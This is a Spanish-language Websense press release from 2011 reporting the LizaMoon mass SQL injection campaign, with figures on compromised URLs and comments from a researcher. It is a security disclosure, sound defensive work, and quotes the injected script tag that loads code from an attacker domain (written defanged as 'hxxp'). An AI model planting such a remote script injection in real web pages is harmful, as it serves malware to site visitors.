La campaña de inyección masiva LizaMoon sigue activa y afecta a más de 500,000 URLs

websenseSAN DIEGO, CA  7 de abril de 2011 – Websense Security Labs y la Websense Threatseeker Network identificaron una nueva campaña maliciosa de inyección masiva a la que denominamos LizaMoon. Los clientes de Websense están protegidos mediante el Advanced Classification Engine.

La inyección masiva LizaMoon es un ataque de inyección de SQL que inserta la siguiente línea en el código de la página:

<script src=hxxp://lizamoon.com/ur.php></script> 

“Si bien en un inicio tuvo 28,000 impactos ahora estamos viendo más de 500,000 URLs infectados lo que hace a la inyección masiva LizaMoon una de las campañas de inyección masiva más grandes que hayamos visto. Hemos estado monitoreando el ataque desde que surgió y notamos que el número de URLs comprometidos sigue aumentando así como el de dominios – diferentes sitios  cargados han comenzado a involucrarse además del lizamoon.com original. Los sitios con carga permanecen inactivos actualmente aunque podrían ser ‘encendidos’ en cualquier momento. Sólo podemos especular en cuanto a lo que los chicos malos están esperando”, señaló Carl Leonard, de Websense Security Labs.

También hemos podido identificar varios  URLs a los que se inyectó de la misma forma por lo que el ataque es aún mayor de lo que pensamos en un inicio. Una búsqueda en Google arroja más de 1,500,000 resultados que tienen un enlace con la misma estructura de URL que el ataque inicial. Los resultados de búsqueda de Google no siempre son los mejores indicadores de cuánto se ha extendido un ataque ya que cuentan cada URL o página únicos no el sitio o el dominio pero sí puede indicar el ámbito del problema si se observa cómo crecen o disminuyen los números con el tiempo.

 “Websense Security Labs Research muestra que casi el 80 por ciento de los sitios maliciosos son sitios legítimos que han sido infectados. Infortunadamente, estos recientes ataques son más ejemplos de esta ola continua”, agregó.

Websense Security Labs seguirá monitoreando este ataque de inyección masiva y dará a conocer información de último momento cuando esté disponible. Para consultar las preguntas frecuentes y ver un video que muestra lo que sucede cuando un usuario visita un sitio al que se ha inyectado el script LizaMoon, visite nuestro blog.

Acerca de Websense, Inc. 

Websense, Inc. (NASDAQ: WBSN), líder global en soluciones unificadas de seguridad de contenido para Web, datos y correo electrónico, ofrece la mejor seguridad contra las amenazas modernas al costo total de propiedad más bajos a decenas de miles de empresas grandes, medianas y pequeñas alrededor del mundo. Distribuidas a través de una red global de socios de canal y entregadas como software, appliance y software como servicio (SaaS), las soluciones de seguridad de contenido de Websense ayudan a las organizaciones a aprovechar las nuevas herramientas de comunicación, colaboración y Web 2.0, al tiempo de proteger contra amenazas persistentes avanzadas, evitando la pérdida de información confidencial y aplicando las políticas de uso de Internet y seguridad. Las oficinas corporativas de Websense se encuentran en San Diego, California, y hay oficinas alrededor del mundo. Para consultar más información, visite http://www.websense.com/latam

Para conocer más de Websense síganos en Twitter en: twitter.com/WebsenseLatam y twitter.com/websense.

Relacionados

Deja un comentario

Abrir chat
Escanea el código
Hola 👋
¿En qué podemos ayudarte?